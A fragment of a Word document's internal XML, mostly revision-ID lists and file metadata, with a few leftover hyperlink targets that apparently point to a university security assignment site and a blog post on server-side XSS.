  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>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7943"/>
    <w:rsid w:val="00007E96"/>
    <w:rsid w:val="000114DF"/>
    <w:rsid w:val="0001493A"/>
    <w:rsid w:val="0002041B"/>
    <w:rsid w:val="00023B7A"/>
    <w:rsid w:val="00050CAB"/>
    <w:rsid w:val="00054D5D"/>
    <w:rsid w:val="00060395"/>
    <w:rsid w:val="000609AF"/>
    <w:rsid w:val="00064F39"/>
    <w:rsid w:val="00066164"/>
    <w:rsid w:val="00075FE2"/>
    <w:rsid w:val="0008135A"/>
    <w:rsid w:val="00090A92"/>
    <w:rsid w:val="000A6C1C"/>
    <w:rsid w:val="000B3EA6"/>
    <w:rsid w:val="000B5C4F"/>
    <w:rsid w:val="000E2EFB"/>
    <w:rsid w:val="000E5ACE"/>
    <w:rsid w:val="000F40D6"/>
    <w:rsid w:val="0010484F"/>
    <w:rsid w:val="00105647"/>
    <w:rsid w:val="00112E4F"/>
    <w:rsid w:val="00114B42"/>
    <w:rsid w:val="001243CE"/>
    <w:rsid w:val="0012582B"/>
    <w:rsid w:val="00126F05"/>
    <w:rsid w:val="001330DC"/>
    <w:rsid w:val="001372EB"/>
    <w:rsid w:val="00140C3E"/>
    <w:rsid w:val="00150936"/>
    <w:rsid w:val="00153523"/>
    <w:rsid w:val="00155580"/>
    <w:rsid w:val="00160EBD"/>
    <w:rsid w:val="00164D6C"/>
    <w:rsid w:val="00167352"/>
    <w:rsid w:val="0017577D"/>
    <w:rsid w:val="00175C58"/>
    <w:rsid w:val="00175F07"/>
    <w:rsid w:val="00180B47"/>
    <w:rsid w:val="00182512"/>
    <w:rsid w:val="00183A73"/>
    <w:rsid w:val="00193AA1"/>
    <w:rsid w:val="001A5225"/>
    <w:rsid w:val="001A65EF"/>
    <w:rsid w:val="001A78D3"/>
    <w:rsid w:val="001B0083"/>
    <w:rsid w:val="001B1E20"/>
    <w:rsid w:val="001B403B"/>
    <w:rsid w:val="001C2B0E"/>
    <w:rsid w:val="001C3373"/>
    <w:rsid w:val="001E03E4"/>
    <w:rsid w:val="001E0727"/>
    <w:rsid w:val="001E3626"/>
    <w:rsid w:val="001E4179"/>
    <w:rsid w:val="001F4A1A"/>
    <w:rsid w:val="001F6955"/>
    <w:rsid w:val="001F709A"/>
    <w:rsid w:val="002008F4"/>
    <w:rsid w:val="002030B8"/>
    <w:rsid w:val="00204364"/>
    <w:rsid w:val="00216019"/>
    <w:rsid w:val="002313B7"/>
    <w:rsid w:val="002367D2"/>
    <w:rsid w:val="0024296E"/>
    <w:rsid w:val="0024764A"/>
    <w:rsid w:val="00255E9A"/>
    <w:rsid w:val="002563AA"/>
    <w:rsid w:val="002576FD"/>
    <w:rsid w:val="002660E2"/>
    <w:rsid w:val="00267A98"/>
    <w:rsid w:val="00277A66"/>
    <w:rsid w:val="00282ECA"/>
    <w:rsid w:val="00286242"/>
    <w:rsid w:val="00286CE4"/>
    <w:rsid w:val="0029147B"/>
    <w:rsid w:val="00297E88"/>
    <w:rsid w:val="002A05A7"/>
    <w:rsid w:val="002A4D90"/>
    <w:rsid w:val="002A4F0E"/>
    <w:rsid w:val="002B68D3"/>
    <w:rsid w:val="002C5899"/>
    <w:rsid w:val="002C68B3"/>
    <w:rsid w:val="002D1200"/>
    <w:rsid w:val="002D5E3D"/>
    <w:rsid w:val="00304E08"/>
    <w:rsid w:val="00311883"/>
    <w:rsid w:val="00312837"/>
    <w:rsid w:val="00313563"/>
    <w:rsid w:val="00335B61"/>
    <w:rsid w:val="00343DAD"/>
    <w:rsid w:val="00347350"/>
    <w:rsid w:val="00351E57"/>
    <w:rsid w:val="0035235A"/>
    <w:rsid w:val="00353236"/>
    <w:rsid w:val="00362112"/>
    <w:rsid w:val="00363FB4"/>
    <w:rsid w:val="003649DF"/>
    <w:rsid w:val="00376EF5"/>
    <w:rsid w:val="003775C6"/>
    <w:rsid w:val="0038184A"/>
    <w:rsid w:val="00395835"/>
    <w:rsid w:val="003976D2"/>
    <w:rsid w:val="003977D5"/>
    <w:rsid w:val="003A192E"/>
    <w:rsid w:val="003A214B"/>
    <w:rsid w:val="003A6CE0"/>
    <w:rsid w:val="003B0E50"/>
    <w:rsid w:val="003C0E74"/>
    <w:rsid w:val="003C1EA3"/>
    <w:rsid w:val="003C5CBB"/>
    <w:rsid w:val="003D44DC"/>
    <w:rsid w:val="003E560A"/>
    <w:rsid w:val="003F65A8"/>
    <w:rsid w:val="00404126"/>
    <w:rsid w:val="00410DBA"/>
    <w:rsid w:val="00423324"/>
    <w:rsid w:val="004303B6"/>
    <w:rsid w:val="00436429"/>
    <w:rsid w:val="00437C9E"/>
    <w:rsid w:val="00442F5E"/>
    <w:rsid w:val="00445884"/>
    <w:rsid w:val="00447656"/>
    <w:rsid w:val="00450B73"/>
    <w:rsid w:val="00467028"/>
    <w:rsid w:val="004873E9"/>
    <w:rsid w:val="004939A9"/>
    <w:rsid w:val="00495598"/>
    <w:rsid w:val="004971FC"/>
    <w:rsid w:val="00497F44"/>
    <w:rsid w:val="004A0B74"/>
    <w:rsid w:val="004A329C"/>
    <w:rsid w:val="004A4410"/>
    <w:rsid w:val="004A5BFF"/>
    <w:rsid w:val="004A69ED"/>
    <w:rsid w:val="004A753E"/>
    <w:rsid w:val="004B04ED"/>
    <w:rsid w:val="004C12C4"/>
    <w:rsid w:val="004C22B1"/>
    <w:rsid w:val="004E6D41"/>
    <w:rsid w:val="004F3285"/>
    <w:rsid w:val="004F620E"/>
    <w:rsid w:val="005239C8"/>
    <w:rsid w:val="00523A6B"/>
    <w:rsid w:val="00525A0B"/>
    <w:rsid w:val="00537C69"/>
    <w:rsid w:val="00542873"/>
    <w:rsid w:val="005440E0"/>
    <w:rsid w:val="00544F17"/>
    <w:rsid w:val="0054643C"/>
    <w:rsid w:val="005507F0"/>
    <w:rsid w:val="005541D8"/>
    <w:rsid w:val="00560E98"/>
    <w:rsid w:val="00580D52"/>
    <w:rsid w:val="00581A4A"/>
    <w:rsid w:val="0058216A"/>
    <w:rsid w:val="00585168"/>
    <w:rsid w:val="005940D0"/>
    <w:rsid w:val="00594406"/>
    <w:rsid w:val="00594D62"/>
    <w:rsid w:val="005C4D69"/>
    <w:rsid w:val="005D1331"/>
    <w:rsid w:val="005D7009"/>
    <w:rsid w:val="005D7A44"/>
    <w:rsid w:val="005E23B4"/>
    <w:rsid w:val="005E32BC"/>
    <w:rsid w:val="005F1E95"/>
    <w:rsid w:val="005F7F12"/>
    <w:rsid w:val="00606CDB"/>
    <w:rsid w:val="0062189F"/>
    <w:rsid w:val="00622C98"/>
    <w:rsid w:val="006262E2"/>
    <w:rsid w:val="00647D05"/>
    <w:rsid w:val="00654AC7"/>
    <w:rsid w:val="00654BB6"/>
    <w:rsid w:val="00654C43"/>
    <w:rsid w:val="006558E0"/>
    <w:rsid w:val="006558E4"/>
    <w:rsid w:val="00655E9F"/>
    <w:rsid w:val="00656CB3"/>
    <w:rsid w:val="00657359"/>
    <w:rsid w:val="006668EE"/>
    <w:rsid w:val="00666F53"/>
    <w:rsid w:val="0066781A"/>
    <w:rsid w:val="00670C47"/>
    <w:rsid w:val="00672E72"/>
    <w:rsid w:val="006750D3"/>
    <w:rsid w:val="006758A4"/>
    <w:rsid w:val="006847C1"/>
    <w:rsid w:val="00696EC2"/>
    <w:rsid w:val="006A1688"/>
    <w:rsid w:val="006A780C"/>
    <w:rsid w:val="006A7AB3"/>
    <w:rsid w:val="006B35B5"/>
    <w:rsid w:val="006B4A1B"/>
    <w:rsid w:val="006B679F"/>
    <w:rsid w:val="006C42E3"/>
    <w:rsid w:val="006D4145"/>
    <w:rsid w:val="006E038E"/>
    <w:rsid w:val="006E4BBA"/>
    <w:rsid w:val="006F13B0"/>
    <w:rsid w:val="00710489"/>
    <w:rsid w:val="00712563"/>
    <w:rsid w:val="00717E64"/>
    <w:rsid w:val="007220D1"/>
    <w:rsid w:val="0072417B"/>
    <w:rsid w:val="00724DFB"/>
    <w:rsid w:val="00736B0C"/>
    <w:rsid w:val="00737772"/>
    <w:rsid w:val="007478AC"/>
    <w:rsid w:val="0075232E"/>
    <w:rsid w:val="007523AD"/>
    <w:rsid w:val="00754770"/>
    <w:rsid w:val="00761200"/>
    <w:rsid w:val="00767B29"/>
    <w:rsid w:val="007775D0"/>
    <w:rsid w:val="0078694B"/>
    <w:rsid w:val="00787455"/>
    <w:rsid w:val="00795DE3"/>
    <w:rsid w:val="007967EC"/>
    <w:rsid w:val="007A4CC0"/>
    <w:rsid w:val="007B5DA2"/>
    <w:rsid w:val="007D4321"/>
    <w:rsid w:val="007D48C1"/>
    <w:rsid w:val="007E1BF2"/>
    <w:rsid w:val="007E26A1"/>
    <w:rsid w:val="007E3C8D"/>
    <w:rsid w:val="0080015F"/>
    <w:rsid w:val="00803307"/>
    <w:rsid w:val="00813C14"/>
    <w:rsid w:val="008273E8"/>
    <w:rsid w:val="00827A30"/>
    <w:rsid w:val="00827B15"/>
    <w:rsid w:val="008460A1"/>
    <w:rsid w:val="00850739"/>
    <w:rsid w:val="00855B99"/>
    <w:rsid w:val="00867C7E"/>
    <w:rsid w:val="00882282"/>
    <w:rsid w:val="00891291"/>
    <w:rsid w:val="00895D94"/>
    <w:rsid w:val="008C04BA"/>
    <w:rsid w:val="008C1E5E"/>
    <w:rsid w:val="008D59D5"/>
    <w:rsid w:val="008E0DB0"/>
    <w:rsid w:val="008F4532"/>
    <w:rsid w:val="008F5067"/>
    <w:rsid w:val="00902603"/>
    <w:rsid w:val="00907ED6"/>
    <w:rsid w:val="00910731"/>
    <w:rsid w:val="00930E35"/>
    <w:rsid w:val="00932C86"/>
    <w:rsid w:val="009340BA"/>
    <w:rsid w:val="00935E89"/>
    <w:rsid w:val="00937634"/>
    <w:rsid w:val="009376D1"/>
    <w:rsid w:val="00940BCF"/>
    <w:rsid w:val="00941416"/>
    <w:rsid w:val="009425F2"/>
    <w:rsid w:val="00942780"/>
    <w:rsid w:val="00945515"/>
    <w:rsid w:val="00950C6F"/>
    <w:rsid w:val="00962814"/>
    <w:rsid w:val="0096686D"/>
    <w:rsid w:val="009716A7"/>
    <w:rsid w:val="00982A91"/>
    <w:rsid w:val="009856EF"/>
    <w:rsid w:val="00986CE9"/>
    <w:rsid w:val="00987F81"/>
    <w:rsid w:val="009932A2"/>
    <w:rsid w:val="009A29D8"/>
    <w:rsid w:val="009A4F24"/>
    <w:rsid w:val="009B2B33"/>
    <w:rsid w:val="009C0F9C"/>
    <w:rsid w:val="009C676D"/>
    <w:rsid w:val="009C7EC5"/>
    <w:rsid w:val="009E6F77"/>
    <w:rsid w:val="009F58A8"/>
    <w:rsid w:val="00A114E1"/>
    <w:rsid w:val="00A12CB7"/>
    <w:rsid w:val="00A13B1C"/>
    <w:rsid w:val="00A206A6"/>
    <w:rsid w:val="00A26AA6"/>
    <w:rsid w:val="00A32B78"/>
    <w:rsid w:val="00A37457"/>
    <w:rsid w:val="00A424BD"/>
    <w:rsid w:val="00A42A09"/>
    <w:rsid w:val="00A44982"/>
    <w:rsid w:val="00A4509E"/>
    <w:rsid w:val="00A5130D"/>
    <w:rsid w:val="00A56C79"/>
    <w:rsid w:val="00A64A19"/>
    <w:rsid w:val="00A656A8"/>
    <w:rsid w:val="00A71545"/>
    <w:rsid w:val="00A73E6F"/>
    <w:rsid w:val="00A74CAB"/>
    <w:rsid w:val="00A83B12"/>
    <w:rsid w:val="00A86834"/>
    <w:rsid w:val="00A87999"/>
    <w:rsid w:val="00A94642"/>
    <w:rsid w:val="00AA121B"/>
    <w:rsid w:val="00AA319D"/>
    <w:rsid w:val="00AA76CE"/>
    <w:rsid w:val="00AB0EE0"/>
    <w:rsid w:val="00AC002E"/>
    <w:rsid w:val="00AD14A8"/>
    <w:rsid w:val="00AD22C8"/>
    <w:rsid w:val="00AD5D0F"/>
    <w:rsid w:val="00AF759B"/>
    <w:rsid w:val="00B005E5"/>
    <w:rsid w:val="00B02622"/>
    <w:rsid w:val="00B04F50"/>
    <w:rsid w:val="00B069CE"/>
    <w:rsid w:val="00B10AD0"/>
    <w:rsid w:val="00B30241"/>
    <w:rsid w:val="00B31B96"/>
    <w:rsid w:val="00B33482"/>
    <w:rsid w:val="00B4227F"/>
    <w:rsid w:val="00B73FF8"/>
    <w:rsid w:val="00B827BD"/>
    <w:rsid w:val="00B86EC7"/>
    <w:rsid w:val="00B93ABC"/>
    <w:rsid w:val="00B97362"/>
    <w:rsid w:val="00BA184D"/>
    <w:rsid w:val="00BA6F1D"/>
    <w:rsid w:val="00BA7473"/>
    <w:rsid w:val="00BC42F3"/>
    <w:rsid w:val="00BD0A53"/>
    <w:rsid w:val="00BF1528"/>
    <w:rsid w:val="00BF61CF"/>
    <w:rsid w:val="00C06271"/>
    <w:rsid w:val="00C13A2E"/>
    <w:rsid w:val="00C17FCA"/>
    <w:rsid w:val="00C20424"/>
    <w:rsid w:val="00C21472"/>
    <w:rsid w:val="00C21DF5"/>
    <w:rsid w:val="00C3428C"/>
    <w:rsid w:val="00C43205"/>
    <w:rsid w:val="00C43B90"/>
    <w:rsid w:val="00C45EB0"/>
    <w:rsid w:val="00C51AAE"/>
    <w:rsid w:val="00C61E57"/>
    <w:rsid w:val="00C71EE1"/>
    <w:rsid w:val="00C72758"/>
    <w:rsid w:val="00C75982"/>
    <w:rsid w:val="00C823F1"/>
    <w:rsid w:val="00C93459"/>
    <w:rsid w:val="00C954D0"/>
    <w:rsid w:val="00C96D21"/>
    <w:rsid w:val="00CC032C"/>
    <w:rsid w:val="00CC05B6"/>
    <w:rsid w:val="00CC4150"/>
    <w:rsid w:val="00CC583C"/>
    <w:rsid w:val="00CC6179"/>
    <w:rsid w:val="00CD4C77"/>
    <w:rsid w:val="00CE7F27"/>
    <w:rsid w:val="00D01380"/>
    <w:rsid w:val="00D04533"/>
    <w:rsid w:val="00D12037"/>
    <w:rsid w:val="00D1344F"/>
    <w:rsid w:val="00D134FD"/>
    <w:rsid w:val="00D2165F"/>
    <w:rsid w:val="00D27A14"/>
    <w:rsid w:val="00D41A96"/>
    <w:rsid w:val="00D43C2F"/>
    <w:rsid w:val="00D6085C"/>
    <w:rsid w:val="00D62BCA"/>
    <w:rsid w:val="00D720FF"/>
    <w:rsid w:val="00D75AB9"/>
    <w:rsid w:val="00D81A9D"/>
    <w:rsid w:val="00DB0240"/>
    <w:rsid w:val="00DB2582"/>
    <w:rsid w:val="00DC5D42"/>
    <w:rsid w:val="00DD4AB2"/>
    <w:rsid w:val="00DD5C1A"/>
    <w:rsid w:val="00DD7C88"/>
    <w:rsid w:val="00DF64B1"/>
    <w:rsid w:val="00DF7B67"/>
    <w:rsid w:val="00E1151C"/>
    <w:rsid w:val="00E14D63"/>
    <w:rsid w:val="00E26F06"/>
    <w:rsid w:val="00E37C79"/>
    <w:rsid w:val="00E53036"/>
    <w:rsid w:val="00E55ED0"/>
    <w:rsid w:val="00E639A3"/>
    <w:rsid w:val="00E8710D"/>
    <w:rsid w:val="00E924B5"/>
    <w:rsid w:val="00EA1D35"/>
    <w:rsid w:val="00EA4AC1"/>
    <w:rsid w:val="00EA5EB5"/>
    <w:rsid w:val="00EB0708"/>
    <w:rsid w:val="00EC2093"/>
    <w:rsid w:val="00EC7F17"/>
    <w:rsid w:val="00ED14CE"/>
    <w:rsid w:val="00ED2041"/>
    <w:rsid w:val="00ED7E7A"/>
    <w:rsid w:val="00EE2241"/>
    <w:rsid w:val="00EE51EF"/>
    <w:rsid w:val="00EF0E63"/>
    <w:rsid w:val="00F06721"/>
    <w:rsid w:val="00F13228"/>
    <w:rsid w:val="00F175B2"/>
    <w:rsid w:val="00F237EF"/>
    <w:rsid w:val="00F51237"/>
    <w:rsid w:val="00F66430"/>
    <w:rsid w:val="00F76D74"/>
    <w:rsid w:val="00FA023E"/>
    <w:rsid w:val="00FA02F2"/>
    <w:rsid w:val="00FA5BCB"/>
    <w:rsid w:val="00FB24A0"/>
    <w:rsid w:val="00FB55D4"/>
    <w:rsid w:val="00FC201A"/>
    <w:rsid w:val="00FC6D75"/>
    <w:rsid w:val="00FD22BD"/>
    <w:rsid w:val="00FD2359"/>
    <w:rsid w:val="00FD6267"/>
    <w:rsid w:val="00FE285B"/>
    <w:rsid w:val="00FE53E3"/>
    <w:rsid w:val="00FE5F13"/>
    <w:rsid w:val="00FF0D10"/>
    <w:rsid w:val="00FF2A7E"/>
    <w:rsid w:val="00FF71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signment-hermes.unimelb.life/find-user.php?usernam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assignment-hermes.unimelb.life/pass_probation.php?user=xiandew"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miguelxpn.com/security/2020/03/08/Server-side-XS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17</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399</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-21T09:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-08T01:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>